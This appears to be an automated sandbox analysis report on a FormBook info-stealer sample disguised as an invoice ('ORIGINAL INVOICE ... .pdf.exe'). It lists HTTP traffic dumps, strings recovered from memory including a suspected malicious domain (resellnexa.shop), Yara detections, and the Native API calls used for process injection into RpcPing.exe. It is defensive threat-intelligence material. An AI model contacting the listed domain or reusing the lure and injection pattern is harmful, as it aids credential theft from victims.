6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:46 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Wed, 02 Oct 2024 00:06:49 GMTContent-Type: text/html; charset=utf-8Content-Length: 555Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693090420.0000000005A07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlru-ru
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.resellnexa.shop
Source: fFUkGixTNm.exe, 00000009.00000002.2932524352.000000000590D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.resellnexa.shop/sfpe/
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ORIGINAL INVOICE COAU7230734298.pdf.exe, 00000000.00000002.1693187072.0000000006BC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033y
Source: RpcPing.exe, 00000008.00000002.2929881128.0000000003381000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RpcPing.exe, 00000008.00000003.2428440920.00000000084B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RpcPing.exe, 00000008.00000003.2439091728.00000000084D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2242460905.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2930839169.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2239761495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.2240933872.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.2930935773.00000000036F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2929623724.0000000003260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.2931097936.0000000003840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe
Source: initial sample	Static PE information: Filename: ORIGINAL INVOICE COAU7230734298.pdf.exe

Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_0042BFF3 NtClose,	3_2_0042BFF3
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52B60 NtClose,LdrInitializeThunk,	3_2_01A52B60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01A52DF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01A52C70
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A535C0 NtCreateMutant,LdrInitializeThunk,	3_2_01A535C0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A54340 NtSetContextThread,	3_2_01A54340
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A54650 NtSuspendThread,	3_2_01A54650
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52BA0 NtEnumerateValueKey,	3_2_01A52BA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52B80 NtQueryInformationFile,	3_2_01A52B80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52BE0 NtQueryValueKey,	3_2_01A52BE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52BF0 NtAllocateVirtualMemory,	3_2_01A52BF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52AB0 NtWaitForSingleObject,	3_2_01A52AB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52AF0 NtWriteFile,	3_2_01A52AF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52AD0 NtReadFile,	3_2_01A52AD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52DB0 NtEnumerateKey,	3_2_01A52DB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52DD0 NtDelayExecution,	3_2_01A52DD0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52D30 NtUnmapViewOfSection,	3_2_01A52D30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52D00 NtSetInformationFile,	3_2_01A52D00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52D10 NtMapViewOfSection,	3_2_01A52D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52CA0 NtQueryInformationToken,	3_2_01A52CA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52CF0 NtOpenProcess,	3_2_01A52CF0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52CC0 NtQueryVirtualMemory,	3_2_01A52CC0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52C00 NtQueryInformationProcess,	3_2_01A52C00
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52C60 NtCreateKey,	3_2_01A52C60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52FA0 NtQuerySection,	3_2_01A52FA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52FB0 NtResumeThread,	3_2_01A52FB0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52F90 NtProtectVirtualMemory,	3_2_01A52F90
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52FE0 NtCreateFile,	3_2_01A52FE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52F30 NtCreateSection,	3_2_01A52F30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52F60 NtCreateProcessEx,	3_2_01A52F60
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52EA0 NtAdjustPrivilegesToken,	3_2_01A52EA0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52E80 NtReadVirtualMemory,	3_2_01A52E80
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52EE0 NtQueueApcThread,	3_2_01A52EE0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A52E30 NtWriteVirtualMemory,	3_2_01A52E30
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A53090 NtSetValueKey,	3_2_01A53090
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A53010 NtOpenDirectoryObject,	3_2_01A53010
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A539B0 NtGetContextThread,	3_2_01A539B0
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A53D10 NtOpenProcessToken,	3_2_01A53D10
Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exe	Code function: 3_2_01A53D70 NtOpenThread,	3_2_01A53D70
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A54340 NtSetContextThread,LdrInitializeThunk,	8_2_03A54340
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A54650 NtSuspendThread,LdrInitializeThunk,	8_2_03A54650
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52BA0 NtEnumerateValueKey,LdrInitializeThunk,	8_2_03A52BA0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52BE0 NtQueryValueKey,LdrInitializeThunk,	8_2_03A52BE0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_03A52BF0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52B60 NtClose,LdrInitializeThunk,	8_2_03A52B60
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52AF0 NtWriteFile,LdrInitializeThunk,	8_2_03A52AF0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52AD0 NtReadFile,LdrInitializeThunk,	8_2_03A52AD0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52FB0 NtResumeThread,LdrInitializeThunk,	8_2_03A52FB0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52FE0 NtCreateFile,LdrInitializeThunk,	8_2_03A52FE0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52F30 NtCreateSection,LdrInitializeThunk,	8_2_03A52F30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52E80 NtReadVirtualMemory,LdrInitializeThunk,	8_2_03A52E80
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52EE0 NtQueueApcThread,LdrInitializeThunk,	8_2_03A52EE0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52DF0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_03A52DF0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52DD0 NtDelayExecution,LdrInitializeThunk,	8_2_03A52DD0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52D30 NtUnmapViewOfSection,LdrInitializeThunk,	8_2_03A52D30
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52D10 NtMapViewOfSection,LdrInitializeThunk,	8_2_03A52D10
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52CA0 NtQueryInformationToken,LdrInitializeThunk,	8_2_03A52CA0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52C60 NtCreateKey,LdrInitializeThunk,	8_2_03A52C60
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52C70 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_03A52C70
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A535C0 NtCreateMutant,LdrInitializeThunk,	8_2_03A535C0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A539B0 NtGetContextThread,LdrInitializeThunk,	8_2_03A539B0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52B80 NtQueryInformationFile,	8_2_03A52B80
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52AB0 NtWaitForSingleObject,	8_2_03A52AB0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52FA0 NtQuerySection,	8_2_03A52FA0
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52F90 NtProtectVirtualMemory,	8_2_03A52F90
Source: C:\Windows\SysWOW64\RpcPing.exe	Code function: 8_2_03A52F60 NtCreateProcessEx,	8_2_03A52F60
